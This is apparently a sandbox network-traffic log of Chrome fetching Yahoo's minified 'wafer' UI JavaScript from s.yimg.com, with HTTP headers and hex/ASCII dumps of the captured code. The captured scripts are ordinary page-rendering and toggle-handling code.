                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 70 2c 63 3d 6e 2e 70 61 72 74 6e 65 72 44 61 74 61 3b 69 66 28 21 63 7c 7c 21 6f 29 72 65 74 75 72 6e 20 72 26 26 72 28 69 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 61 26 26 28 65 2e 64 61 74 61 2e 70 61 72 74 6e 65 72 44 61 74 61 2e 67 72 6f 75 70 4e 61 6d 65 3d 61 29 3b 76 61 72 20 6c 3d 63 2e 75 75 69 64 2c 64 3d 7b 61 73 73 65 74 73 3a 74 2c 69 74 65 6d 73 3a 5b 65 5d 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 5f 5f 77 61 66 65 72 43 61 61 73 43 6f 6c 6c 65 63 74 69 6f 6e 2e 73 65 74 28 6c 2c 64 29 2c 65 7d 29 29 7d 2c 79 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: p,c=n.partnerData;if(!c||!o)return r&&r(i),Promise.resolve();a&&(e.data.partnerData.groupName=a);var l=c.uuid,d={assets:t,items:[e]};return window.__waferCaasCollection.set(l,d),e}))},y=function(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 72 29 26 26 28 65 5b 72 5d 3d 61 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 43 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 5b 5d 2c 72 3d 21 30 2c 69 3d 21 31 2c 73 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 6e 2c 6f 3d 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 72 3d 28 6e 3d 6f 2e 6e 65 78 74 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: function(e){for(var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e},C=function(){function e(e,t){var a=[],r=!0,i=!1,s=void 0;try{for(var n,o=e[Symbol.iterator]();!(r=(n=o.next(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 65 74 55 72 6c 50 61 72 61 6d 65 74 65 72 56 61 6c 75 65 42 79 4e 61 6d 65 2c 44 3d 52 2e 67 65 74 57 61 66 65 72 46 6f 72 54 79 70 65 2c 46 3d 52 2e 67 65 74 57 61 66 65 72 49 6e 73 74 61 6e 63 65 46 6f 72 45 6c 65 6d 2c 7a 3d 52 2e 73 65 74 54 69 6d 65 6f 75 74 2c 48 3d 5b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 2c 22 63 61 61 73 2d 75 72 6c 22 2c 22 63 61 61 73 2d 75 75 69 64 22 5d 2c 59 3d 7b 7d 2c 55 3d 7b 7d 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 73 3d 61 2e 63 61 61 73 43 6f 6e 66 69 67 2c 6e 3d 61 2e 65
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: etUrlParameterValueByName,D=R.getWaferForType,F=R.getWaferInstanceForElem,z=R.setTimeout,H=["caas-collapsed","caas-url","caas-uuid"],Y={},U={},G=function(e){function t(e){var a=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},s=a.caasConfig,n=a.e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 6c 2c 7b 22 63 61 61 73 2d 63 6f 6c 6c 61 70 73 65 64 22 3a 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 30 3a 4e 75 6d 62 65 72 28 66 29 2c 22 63 61 61 73 2d 75 72 6c 22 3a 75 2c 22 63 61 61 73 2d 75 75 69 64 22 3a 68 2c 63 61 63 68 65 3a 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 31 3a 4e 75 6d 62 65 72 28 64 29 2c 63 61 61 73 43 6f 6e 66 69 67 3a 73 2c 63 61 63 68 65 53 74 72 61 74 65 67 79 3a 76 2c 63 61 63 68 65 54 74 6c 3a 6e 75 6c 6c 3d 3d 3d 70 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 33 30 30 3a 4e 75 6d 62 65 72 28 70 29 2c 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 3a 50 2c 69 73 50 72 65 66 65 74 63 68 3a 6e 75 6c 6c 3d 3d 3d 6d 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6d 3f 30 3a 4e 75 6d 62 65 72 28 6d 29 2c 74 61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: l,{"caas-collapsed":null===f||void 0===f?0:Number(f),"caas-url":u,"caas-uuid":h,cache:null===d||void 0===d?1:Number(d),caasConfig:s,cacheStrategy:v,cacheTtl:null===p||void 0===p?300:Number(p),dependencyElem:P,isPrefetch:null===m||void 0===m?0:Number(m),ta
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 20 69 73 20 6d 69 73 73 69 6e 67 22 29 29 3b 76 61 72 20 72 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 69 3d 72 2e 64 65 70 65 6e 64 65 6e 63 79 45 6c 65 6d 2c 73 3d 72 2e 73 75 63 63 65 73 73 43 6c 61 73 73 3b 69 66 28 69 26 26 21 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 6a 65 63 74 28 6e 65 77 20 45 72 72 6f 72 28 22 64 65 70 65 6e 64 65 6e 63 79 20 6e 6f 74 20 79 65 74 20 63 6f 6d 70 6c 65 74 65 22 29 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 75 74 69 6c 2e 65 6c 65 6d 3b 69 66 28 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 73 29 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 21 30 29 3b 76 61 72 20 6f 3d 74 68 69 73 2e 5f 75 74 69 6c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: is missing"));var r=this._util,i=r.dependencyElem,s=r.successClass;if(i&&!i.classList.contains(s))return Promise.reject(new Error("dependency not yet complete"));var n=this._util.elem;if(n.classList.contains(s))return Promise.resolve(!0);var o=this._util
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 73 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 28 74 29 7d 29 2e 63 61 74 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 65 29 7d 29 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 61 73 73 65 74 73 3b 69 66 28 21 74 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 65 3b 69 66 28 22 73 69 64 65 6b 69 63 6b 22 21 3d 3d 77 26 26 77 69 6e 64 6f 77 2e 43 41 41 53 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 61 3d 65 2e 73 74 79 6c 65 2c 72 3d 59 5b 77 5d 3b 72 65 74 75 72 6e 20 72 3f 72 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 3a 28 59 5b 77 5d 3d 79 28 74 2c 61 2c 77 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2c 59 5b 77 5d 29 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s).then(function(t){e(t)}).catch(function(e){r(e)})}).then(function(e){var t=e.assets;if(!t.length)return e;if("sidekick"!==w&&window.CAAS)return e;var a=e.style,r=Y[w];return r?r.then(function(){return e}):(Y[w]=y(t,a,w).then(function(){return e}),Y[w])}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 56 3d 6a 28 76 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 56 26 26 56 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 69 66 28 6f 26 26 6f 2e 63 61 6c 6c 28 65 2c 6e 2c 72 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 77 61 66 65 72 2d 63 61 61 73 2d 74 72 69 67 67 65 72 2d 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 73 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 6e 2c 6d 65 74 61 3a 7b 64 75 72 61 74 69 6f 6e 3a 6c 2c 73 6f 75 72 63 65 3a 67 3f 22 4d 45 4d 4f 52 59
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: V=j(v.getElementsByClassName("caas-body-wrapper"))[0];V&&V.classList.add("caas-body-collapsed")}if(o&&o.call(e,n,r),n.classList.remove("wafer-caas-trigger-inprogress"),n.classList.add(s),S.emitLog({name:"WaferCaas",elem:n,meta:{duration:l,source:g?"MEMORY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 70 73 65 64 22 5d 29 7b 76 61 72 20 6e 3d 6a 28 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 22 63 61 61 73 2d 62 6f 64 79 2d 77 72 61 70 70 65 72 22 29 29 5b 30 5d 3b 6e 26 26 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 61 61 73 2d 62 6f 64 79 2d 63 6f 6c 6c 61 70 73 65 64 22 29 7d 72 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 69 29 2c 53 2e 65 6d 69 74 4c 6f 67 28 7b 6e 61 6d 65 3a 22 57 61 66 65 72 43 61 61 73 22 2c 65 6c 65 6d 3a 72 2c 6d 65 74 61 3a 7b 7d 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 68 61 6e 64 6c 65 53 70 61 63 69 6e 67 41 6e 64 47 65 74 4f 66 66 73 65 74 41 62 6f 76 65 52 69 67 68 74 52 61 69 6c 41 64 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: psed"]){var n=j(s.getElementsByClassName("caas-body-wrapper"))[0];n&&n.classList.add("caas-body-collapsed")}r.classList.add(i),S.emitLog({name:"WaferCaas",elem:r,meta:{}})}},{key:"handleSpacingAndGetOffsetAboveRightRailAds",value:function(e){var t=this._u


                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              81192.168.2.45110287.248.119.2514431800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:38 UTC540OUTGET /aaq/wf/wf-toggle-1.15.4-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC764INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-id-2: vTADDwo3UWRZuxvVr+Mq5VxqgsGDcsHjoBV8oWXcpSPX7x9xcErq9VOSWv9Q4tFR7j6Zd76dNRyXTBJNwXYGQdpuj7/pO5JU
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-request-id: 6C1BVNVV599JCCC3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Thu, 03 Oct 2024 04:52:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Last-Modified: Wed, 20 Apr 2022 09:12:23 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ETag: "9ec69a2055c595f415eade096a476b0d"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              x-amz-version-id: HE26GDjTNsmXBUPJeKnrarkIBLKe8tee
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 12433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Age: 483679
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 74 6f 67 67 6c 65 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 7c 7c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-toggle",[],t):"object"==typeof exports?exports["wafer-toggle"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function a(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 72 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 72 2c 6e 29 26 26 28 65 5b 6e 5d 3d 72 5b 6e 5d 29 7d 72 65 74 75 72 6e 20 65 7d 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 74 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 7b 76 61 72 20 6e 3d 74 5b 72 5d 3b 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 6e 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 6e 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 6e 26 26 28 6e 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: s[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},f=function(){function e(e,t){for(var r=0;r<t.length;r++){var n=t[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(e,n
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 28 6b 2b 22 74 6f 67 67 6c 65 2d 63 6c 61 73 73 22 29 7c 7c 22 22 2c 75 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 62 72 6f 77 73 65 72 2d 64 65 66 61 75 6c 74 2d 62 65 68 61 76 69 6f 72 22 29 2c 6c 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 70 72 65 76 65 6e 74 2d 73 63 72 6f 6c 6c 22 29 2c 66 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 73 79 6e 63 2d 64 65 6c 61 79 22 29 2c 64 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 74 61 72 67 65 74 22 29 2c 76 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b 22 74 6f 67 67 6c 65 2d 62 6f 75 6e 64 61 72 79 22 29 2c 68 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6b 2b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: (k+"toggle-class")||"",u=e.getAttribute(k+"toggle-prevent-browser-default-behavior"),l=e.getAttribute(k+"toggle-prevent-scroll"),f=e.getAttribute(k+"sync-delay"),d=e.getAttribute(k+"toggle-target"),v=e.getAttribute(k+"toggle-boundary"),h=e.getAttribute(k+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 26 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 22 2c 6f 29 7d 7d 2c 7b 6b 65 79 3a 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 5f 75 74 69 6c 2c 74 3d 65 2e 65 6c 65 6d 2c 72 3d 65 2e 65 76 65 6e 74 73 3b 69 66 28 30 21 3d 3d 72 2e 73 69 7a 65 29 7b 76 61 72 20 6e 3d 21 30 2c 6f 3d 21 31 2c 69 3d 76 6f 69 64 20 30 3b 74 72 79 7b 66 6f 72 28 76 61 72 20 61 2c 73 3d 72 2e 6b 65 79 73 28 29 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 3b 21 28 6e 3d 28 61 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 6e 3d 21 30 29 7b 76 61 72 20 75 3d 61 2e 76 61 6c 75 65 2c 6c 3d 74 68 69 73 2e 5f 73 74 61 74 65 2e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: &r.setAttribute("aria-controls",o)}},{key:"addEventListeners",value:function(){var e=this._util,t=e.elem,r=e.events;if(0!==r.size){var n=!0,o=!1,i=void 0;try{for(var a,s=r.keys()[Symbol.iterator]();!(n=(a=s.next()).done);n=!0){var u=a.value,l=this._state.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 6e 4c 6f 61 64 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6f 6e 4c 6f 61 64 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 6d 6f 75 73 65 65 6e 74 65 72 22 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 45 6e 74 65 72 44 65 6c 61 79 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 5f 73 74 61 74 65 2e 63 6c 69 63 6b 41 6e 64 4d 6f 75 73 65 45 78 69 74 54 69 6d 65 6f 75 74 29 7d 7d 2c 7b 6b 65 79 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: nLoad",value:function(){this.processTargets("onLoad")}},{key:"mouseenter",value:function(){this.processTargets("mouseenter")}},{key:"mouseEnterDelay",value:function(){clearTimeout(this._state.clickAndMouseExitTimeout)}},{key:"mouseleave",value:function(){
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08 19:13:39 UTC1300INData Raw: 74 68 69 73 2e 73 77 69 70 65 72 69 67 68 74 28 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 6c 65 66 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 6c 65 66 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 73 77 69 70 65 72 69 67 68 74 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 70 72 6f 63 65 73 73 54 61 72 67 65 74 73 28 22 73 77 69 70 65 72 69 67 68 74 22 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 72 44 72 61 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 75 74 69 6c 2e 64 72 61 67 3d 7b 65 6e 64 58 3a 30 2c 65 6e 64 59 3a 30 2c 6f 76 65 72 61 6c 6c 44 69 72 65 63 74 69 6f 6e 58 3a 30 2c 73 74 61 72 74 58 3a 30 2c 73
